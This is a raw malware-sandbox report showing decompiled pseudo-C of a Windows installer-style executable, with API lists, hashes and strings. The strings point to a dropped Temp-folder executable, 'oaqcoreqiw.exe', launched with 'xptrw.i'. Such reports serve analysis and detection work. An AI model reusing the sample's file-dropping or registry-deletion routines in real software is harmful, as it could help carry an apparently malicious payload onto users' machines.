                                                  				_t26 = E00402DA6(0xfffffff0);
                                                  				_t55 = _t26;
                                                  				 *(_t61 - 0x40) = _t26;
                                                  				if(E00405FAE(_t26) == 0) {
                                                  					E00402DA6(0xffffffed);
                                                  				}
                                                  				E00406133(_t55);
                                                  				_t29 = E00406158(_t55, 0x40000000, 2);
                                                  				 *(_t61 + 8) = _t29;
                                                  				if(_t29 != 0xffffffff) {
                                                  					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                                  					if( *(_t61 - 0x28) != _t49) {
                                                  						_t37 =  *0x42a274;
                                                  						 *(_t61 - 0x44) = _t37;
                                                  						_t54 = GlobalAlloc(0x40, _t37);
                                                  						if(_t54 != _t49) {
                                                  							E004035F8(_t49);
                                                  							E004035E2(_t54,  *(_t61 - 0x44));
                                                  							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                                  							 *(_t61 - 0x10) = _t59;
                                                  							if(_t59 != _t49) {
                                                  								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                                  								while( *_t59 != _t49) {
                                                  									_t51 =  *_t59;
                                                  									_t60 = _t59 + 8;
                                                  									 *(_t61 - 0x3c) =  *_t59;
                                                  									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                  									_t59 = _t60 +  *(_t61 - 0x3c);
                                                  								}
                                                  								GlobalFree( *(_t61 - 0x10));
                                                  							}
                                                  							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                                  							GlobalFree(_t54);
                                                  							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                                  						}
                                                  					}
                                                  					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                                  					CloseHandle( *(_t61 + 8));
                                                  				}
                                                  				_t56 = 0xfffffff3;
                                                  				if(_t52 < _t49) {
                                                  					_t56 = 0xffffffef;
                                                  					DeleteFileW( *(_t61 - 0x40));
                                                  					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                  				}
                                                  				_push(_t56);
                                                  				E00401423();
                                                  				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
                                                  				return 0;
                                                  			}














                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                  • GlobalFree.KERNEL32 ref: 00402A06
                                                  • GlobalFree.KERNEL32 ref: 00402A19
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                  • String ID:
                                                  • API String ID: 2667972263-0
                                                  • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                  • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                                  • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                  • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 77%
                                                  			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                  				char _v68;
                                                  				char _v132;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed int _t23;
                                                  				signed int _t24;
                                                  				void* _t31;
                                                  				void* _t33;
                                                  				void* _t34;
                                                  				void* _t44;
                                                  				signed int _t46;
                                                  				signed int _t50;
                                                  				signed int _t52;
                                                  				signed int _t53;
                                                  				signed int _t55;
                                                  
                                                  				_t23 = _a16;
                                                  				_t53 = _a12;
                                                  				_t44 = 0xffffffdc;
                                                  				if(_t23 == 0) {
                                                  					_push(0x14);
                                                  					_pop(0);
                                                  					_t24 = _t53;
                                                  					if(_t53 < 0x100000) {
                                                  						_push(0xa);
                                                  						_pop(0);
                                                  						_t44 = 0xffffffdd;
                                                  					}
                                                  					if(_t53 < 0x400) {
                                                  						_t44 = 0xffffffde;
                                                  					}
                                                  					if(_t53 < 0xffff3333) {
                                                  						_t52 = 0x14;
                                                  						asm("cdq");
                                                  						_t24 = 1 / _t52 + _t53;
                                                  					}
                                                  					_t25 = _t24 & 0x00ffffff;
                                                  					_t55 = _t24 >> 0;
                                                  					_t46 = 0xa;
                                                  					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                  				} else {
                                                  					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                  					_t50 = 0;
                                                  				}
                                                  				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                  				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
                                                  				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
                                                  				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                  				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
                                                  			}




















                                                  APIs
                                                  • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                  • wsprintfW.USER32 ref: 00404F1B
                                                  • SetDlgItemTextW.USER32 ref: 00404F2E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s$H7B
                                                  • API String ID: 3540041739-107966168
                                                  • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                  • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                                  • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                  • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 48%
                                                  			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                  				void* _v8;
                                                  				int _v12;
                                                  				short _v536;
                                                  				void* _t27;
                                                  				signed int _t33;
                                                  				intOrPtr* _t35;
                                                  				signed int _t45;
                                                  				signed int _t46;
                                                  				signed int _t47;
                                                  
                                                  				_t46 = _a12;
                                                  				_t47 = _t46 & 0x00000300;
                                                  				_t45 = _t46 & 0x00000001;
                                                  				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                  				if(_t27 == 0) {
                                                  					if((_a12 & 0x00000002) == 0) {
                                                  						L3:
                                                  						_push(0x105);
                                                  						_push( &_v536);
                                                  						_push(0);
                                                  						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                                  							__eflags = _t45;
                                                  							if(__eflags != 0) {
                                                  								L10:
                                                  								RegCloseKey(_v8);
                                                  								return 0x3eb;
                                                  							}
                                                  							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                                  							__eflags = _t33;
                                                  							if(_t33 != 0) {
                                                  								break;
                                                  							}
                                                  							_push(0x105);
                                                  							_push( &_v536);
                                                  							_push(_t45);
                                                  						}
                                                  						RegCloseKey(_v8);
                                                  						_t35 = E00406A35(3);
                                                  						if(_t35 != 0) {
                                                  							return  *_t35(_a4, _a8, _t47, 0);
                                                  						}
                                                  						return RegDeleteKeyW(_a4, _a8);
                                                  					}
                                                  					_v12 = 0;
                                                  					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                  						goto L10;
                                                  					}
                                                  					goto L3;
                                                  				}
                                                  				return _t27;
                                                  			}













                                                  APIs
                                                  • RegEnumValueW.ADVAPI32 ref: 00402EFD
                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: CloseEnum$DeleteValue
                                                  • String ID:
                                                  • API String ID: 1354259210-0
                                                  • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                  • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                                  • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                  • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 77%
                                                  			E00401D81(void* __ebx, void* __edx) {
                                                  				struct HWND__* _t30;
                                                  				WCHAR* _t38;
                                                  				void* _t48;
                                                  				void* _t53;
                                                  				signed int _t55;
                                                  				signed int _t60;
                                                  				long _t63;
                                                  				void* _t65;
                                                  
                                                  				_t53 = __ebx;
                                                  				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                                  					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                                  				} else {
                                                  					E00402D84(2);
                                                  					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                                  				}
                                                  				_t55 =  *(_t65 - 0x24);
                                                  				 *(_t65 + 8) = _t30;
                                                  				_t60 = _t55 & 0x00000004;
                                                  				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                                  				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                                  				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                                  				if((_t55 & 0x00010000) == 0) {
                                                  					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                                  				} else {
                                                  					_t38 = E00402DA6(0x11);
                                                  				}
                                                  				 *(_t65 - 0x44) = _t38;
                                                  				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                                  				asm("sbb esi, esi");
                                                  				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                                  				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                                  				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                                  					DeleteObject(_t48);
                                                  				}
                                                  				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                                  					_push(_t63);
                                                  					E004065AF();
                                                  				}
                                                  				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
                                                  				return 0;
                                                  			}

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                  • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                                  • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                  • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 73%
                                                  			E00401E4E(intOrPtr __edx) {
                                                  				void* __edi;
                                                  				int _t9;
                                                  				signed char _t15;
                                                  				struct HFONT__* _t18;
                                                  				intOrPtr _t30;
                                                  				void* _t31;
                                                  				struct HDC__* _t33;
                                                  				void* _t35;
                                                  
                                                  				_t30 = __edx;
                                                  				_t33 = GetDC( *(_t35 - 8));
                                                  				_t9 = E00402D84(2);
                                                  				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                  				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                                  				ReleaseDC( *(_t35 - 8), _t33);
                                                  				 *0x40ce08 = E00402D84(3);
                                                  				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                                  				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                  				 *0x40ce0f = 1;
                                                  				 *0x40ce0c = _t15 & 0x00000001;
                                                  				 *0x40ce0d = _t15 & 0x00000002;
                                                  				 *0x40ce0e = _t15 & 0x00000004;
                                                  				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
                                                  				_t18 = CreateFontIndirectW(0x40cdf8);
                                                  				_push(_t18);
                                                  				_push(_t31);
                                                  				E004065AF();
                                                  				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
                                                  				return 0;
                                                  			}

                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401E51
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                  • ReleaseDC.USER32 ref: 00401E84
                                                    • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                    • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                  • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                  • String ID:
                                                  • API String ID: 2584051700-0
                                                  • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                  • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                                  • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                  • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 59%
                                                  			E00401C43(intOrPtr __edx) {
                                                  				int _t29;
                                                  				long _t30;
                                                  				signed int _t32;
                                                  				WCHAR* _t35;
                                                  				long _t36;
                                                  				int _t41;
                                                  				signed int _t42;
                                                  				int _t46;
                                                  				int _t56;
                                                  				intOrPtr _t57;
                                                  				struct HWND__* _t63;
                                                  				void* _t64;
                                                  
                                                  				_t57 = __edx;
                                                  				_t29 = E00402D84(3);
                                                  				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                  				 *(_t64 - 0x18) = _t29;
                                                  				_t30 = E00402D84(4);
                                                  				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                  				 *(_t64 + 8) = _t30;
                                                  				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                                  					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                                  				}
                                                  				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                                  				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                                  					 *(_t64 + 8) = E00402DA6(0x44);
                                                  				}
                                                  				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                                  				_push(1);
                                                  				if(__eflags != 0) {
                                                  					_t61 = E00402DA6();
                                                  					_t32 = E00402DA6();
                                                  					asm("sbb ecx, ecx");
                                                  					asm("sbb eax, eax");
                                                  					_t35 =  ~( *_t31) & _t61;
                                                  					__eflags = _t35;
                                                  					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                  					goto L10;
                                                  				} else {
                                                  					_t63 = E00402D84();
                                                  					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                  					_t41 = E00402D84(2);
                                                  					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                  					_t56 =  *(_t64 - 0x1c) >> 2;
                                                  					if(__eflags == 0) {
                                                  						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                                  						L10:
                                                  						 *(_t64 - 0x38) = _t36;
                                                  					} else {
                                                  						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                                  						asm("sbb eax, eax");
                                                  						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                  					}
                                                  				}
                                                  				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                                  				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                                  					_push( *(_t64 - 0x38));
                                                  					E004065AF();
                                                  				}
                                                  				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
                                                  				return 0;
                                                  			}

                                                  APIs
                                                  • SendMessageTimeoutW.USER32 ref: 00401CB3
                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                  • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                                                  • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                  • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 91%
                                                  			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                  				int _v8;
                                                  				long _t21;
                                                  				long _t24;
                                                  				char* _t30;
                                                  
                                                  				asm("sbb eax, eax");
                                                  				_v8 = 0x800;
                                                  				_t5 =  &_a4; // 0x422728
                                                  				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                  				_t30 = _a16;
                                                  				if(_t21 != 0) {
                                                  					L4:
                                                  					 *_t30 =  *_t30 & 0x00000000;
                                                  				} else {
                                                  					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                  					_t21 = RegCloseKey(_a20);
                                                  					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                  					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                  						goto L4;
                                                  					}
                                                  				}
                                                  				return _t21;
                                                  			}

                                                  APIs
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,"C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,?,?,0040679D,80000002), ref: 0040657C
                                                  • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,"C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,"C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,"C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,00000000,00422728), ref: 00406587
                                                  Strings
                                                  • "C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i, xrefs: 0040653D
                                                  • ('B, xrefs: 0040655B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID: "C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i$('B
                                                  • API String ID: 3356406503-179150024
                                                  • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                  • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                                  • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                  • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 58%
                                                  			E00405F37(WCHAR* _a4) {
                                                  				WCHAR* _t9;
                                                  
                                                  				_t9 = _a4;
                                                  				_push( &(_t9[lstrlenW(_t9)]));
                                                  				_push(_t9);
                                                  				if( *(CharPrevW()) != 0x5c) {
                                                  					lstrcatW(_t9, 0x40a014);
                                                  				}
                                                  				return _t9;
                                                  			}





                                                  APIs
                                                  • lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,0040362D,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00405F3D
                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,0040362D,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00405F47
                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                                                  Strings
